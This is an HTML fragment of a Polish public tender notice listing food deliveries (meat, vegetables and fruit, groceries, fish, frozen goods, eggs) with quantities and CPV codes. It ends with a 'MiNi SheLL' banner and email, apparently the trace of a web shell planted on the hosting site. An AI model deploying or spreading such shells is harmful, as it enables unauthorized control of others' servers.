<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Schab z/k	kg	220
2	Łopatka b/k	kg	370
3	Karczek b/k	kg	50
4	Udka z kurczaka	kg	250
5	Filet z kurczaka	kg	230
6	Mięso wołowe z  grubego (na pieczeń, rolady)	kg	15
7	Mięso mielone wp.	kg	80
8	Wątroba wieprzowa	kg	30
9	Wątroba drobiowa	kg	40
10	Kiełbasa toruńska	kg	250
11	Kiełbasa zwyczajna	kg	150
12	Pasztetowa wieprzowa	kg	60
13	Pasztet pieczony	kg	30
14	Polędwica drobiowa	kg	50
15	Kiełbasa kminkowa	kg	45
16	Kiełbasa szynkowa wp.	kg	35
17	Kiełbasa cienka z drobiu	kg	50
18	Boczek wędzony b/k	kg	60
19	Boczek rolowany/faszerowany	kg	35
20	Kiełbasa biała	kg	130
21	Parówka śląska cienka	kg	280
22	Kiełbasa mortadela	kg	50
23	Baleron	kg	20
24	Ogonówka	kg	15
25	Szynka wieprzowa gotowana-wędzona	kg	150
26	Mielonka wieprzowa	kg	85
27	Pieczeń rzymska	kg	65
28	Słonina wędzona	kg	65
29	Kabanosy wieprzowe	kg	6
30	Krupniok  - kaszanka	kg	60
31	Porcje rosołowe	kg	385
32	Ogony wieprzowe	kg	15
33	Kiełbasa śląska wieprzowa	kg	160
34	Kiełbasa żywiecka	kg	60
35	Kości wołowe	kg	30
36	Boczek świeży b/k	kg	30
37	Kiełbasa parówkowa gruba	kg	50
38	Żeberka wieprzowe	kg	50
39	Salceson drobiowy	kg	20
40 	Słonina świeża	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Burak czerwony	kg	160
2	Cebula 	kg	450
3	Ziemniak	kg	5200
4	Kapusta czerwona 	kg	100
5	Kapusta biała 	kg	380
6	Marchew	kg	230
7	Pietruszka	kg	100
8	Seler	kg	110
9	Pieczarka	kg	100
10	Por	kg	50
11	Czosnek główka	szt.	100
	Warzywa sezonowe 		
1	Ogórek zielony	kg	130
2	Pomidor	kg	180
3	Kalafior	szt.	25
4	Kalarepa	kg	15
5	Pietruszka zielona 0,25 kg	pęcz	80
6	Sałata zielona 	szt.	60
7	Koperek zielony 0,25 kg	pęcz	80
8	Szczypiorek  0,25 kg	pęcz	60
9	Cebulka zielona 0,25 kg	pęcz	65
10	Kapusta pekińska	kg	70
11	Rzodkiewka 0,25 kg	pęcz	100
12	Botwinka	kg	15
13	Papryka świeża	kg	25
14	Cukinia	kg	12
15	Fasola szparagowa	kg	15
	Warzywa kiszone		
1	Kapusta kiszona	kg	250
2	Ogórek  kiszony	kg	180
3	Żurek 0,5 l	szt.	60
	Owoce		
1	Cytryna	kg	60
2	Pomarańcze 	kg	300
3	Mandarynki	kg	90
4	Kiwi 	kg	80
5	Banany 	kg	350
6	Rabarbar	kg	15
7	Truskawka	kg	36
8	Arbuz	kg	60
9	Jabłko	kg	500
10	Śliwki	kg	100
11	Gruszka	kg	60
12	Nektarynka 	kg	20
13	Brzoskwinia	kg	40
14	Czereśnie             kg         20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.12.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Cukier op.1 kg	kg	1500
2	Cukier puder	kg	55
3	Cukier waniliowy  32g	szt.	80
4	Kasza jęczmienna op.1kg	kg	70
5	Kasza manna op.1 kg	kg	35
6	Mąka wrocławska op.1 kg	kg	420
7	Mąka krupczatka op.1 kg	kg	60
8	Mąka ziemniaczana op.1 kg	kg	20
9	Ryż op. 1 kg	kg	160
10	Sól	kg	180
11	Płatki czekoladowe  1000g	szt.	40
12	Płatki  miodowe 1000g	Szt.	40
13	Płatki owsiane op.500g	kg	25
14	Makaron gruby 500g świderki Lubella	szt.	420
15	Makaron nitki 250 g Czaniecki	szt.	400
16	Olej 	l	350
17	Liść laurowy    20g	szt.	40
18	Majeranek  15 g	szt.	80
19	Ziele angielskie 15 g	szt.	35
20	Papryka mielona 20 g słodka	szt.	100
21	Papryka ostra mielona 20 g	szt.	10
22	Przyprawa  do zupy typu magii 1 litr	szt.	60
23	Czosnek mielony 20 g	szt.	450
24	Pieprz mielony 20 g	szt.	440
25	Kminek 20 g	szt.	30
26	Oregano 20g	Szt.	50
27	Bazylia 20 g	Szt.	50
28	Tymianek 20 g	Szt.	20
29	Carry 20g	Szt.	30
30	Zioła prowansalskie 20g	Szt.	50
31	Jarzynka typu Kucharek 1 kg	szt.	45
32	Proszek do pieczenia 36g	szt.	35
33	Soda oczyszczona 20 g	szt.	25
34	Kisiel owocowy 79 g	szt.	900
35	Budyń 60 g	szt.	600
36	Cynamon 20 g	szt.	30
37	Galaretka 80 g	szt.	10
38	Musztarda  200g	szt.	400
39	Krem chrzanowy 170g	szt.	170
40	Majonez 900 g	szt.	150
41	Keczup 1000 g	szt.	150
42	Chrzan tarty  180 g	szt.	50
43	Ocet 500 g 10%	szt.	20
44	Herbata 100 g granulowana	szt.	400
45	Kawa zbożowa 500 g	szt.	25
46	Kakao 200 g	szt.	50
47	Dżem owocowy 1 kg	szt.	100
48	Dżem  różne smaki 280g	Szt.	360
49	Dżem  wysoko słodzony 6,5 kg	szt.	3
50	Miód naturalny  400 g	szt.	180
51	Krem czekoladowy/ orzechowy 360g 	szt.	500
52	Czekolada mleczna 100 g	szt.	450
53	Baton Pawełek różne smaki	szt.	350
54	Przecier pomidorowy 1 kg	szt.	115
55	Sok owocowy 1 l - karton	szt.	300
56	Syrop owocowy 6,5 kg	Szt.	10
57	Szynka drobiowa konserwa 110 g	szt.	500
58	Konserwa turystyczna 130 g	szt.	200
59	Groszek konserwowy 400g	szt.	100
60	Kukurydza konserwowa 400 g	szt.	100
61	Papryka konserwowa 900 g	szt.	120
62	Ogórek konserwowy 900 g	szt.	240
63	Koncentrat buraczany  330 ml - w butelce	szt.	25
64	Fasola  Jaś	kg	50
65	Fasola kolorowa	kg	20
66	Groch łuskany 	kg	25
67	Pasztet drobiowy 160 g	szt.	1800
68	Ananas w puszce 565 g	szt.	2
69	Brzoskwinia w puszce 850 g	szt.	6
70	Rodzynki 200g	szt.	10
71	Wiórki kokosowe 200 g	szt.	4
72	Masa makowa 1 kg	Szt.	2
73	Skórka pomarańczowa 100g	szt.	6
74	Ciastka - wafle różne smaki	Kg	70
75	Napoje gazowane kolorowe 1,5 l	szt.	300
76	Wody mineralne gazowane 1,5 l	szt.	240.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.00.00-5, 15.61.30.00-9, 15.61.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa Ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z mintaja mrożony	kg	120
2	Ryba Panga mrożona	kg	50
3	Matyjas solony 1 wiaderko 4 kg	szt.	10
4	Makrela wędzona 	kg	60
5	Konserwa  rybna -filet w oleju - 170 g	szt.	330
6	Konserwa rybna - filet  w pomidorach -170g	szt.	330
7	Konserwa rybna - szproty - 170g	sz.	200
8	Konserwa -paprykarz -330g	szt.	250
9	Konserwa - tuńczyk w oleju - kawałki-170g	szt.	450.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.20.00-0, 15.23.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa Mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Mieszanka kompotowa	kg	300
2	Mieszanka warzywna zupa	kg	80
3	Kalafior 	kg	50
4	Brokuły	Kg	30
5	Fasola szparagowa 	kg	50
6	Pierogi ruskie z serem	kg	50
7	Pierogi z kapustą i grzybami	kg	80
8	Pierogi z mięsem	kg	50
9	Pierogi z serem	kg	25
10	Pyzy z mięsem	kg	100
11	Kluski śląskie 	kg	150
12	Kluski ze śliwkami	kg	50
13	Hamburgery drobiowe	Kg	180
14	Groszek mrożony	kg	15
15	Warzywa na patelnie	kg	50
16	Truskawka	kg	60
17	Uszka z kapustą i grzybami	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja  Klasa XL	szt.	17000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.24.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com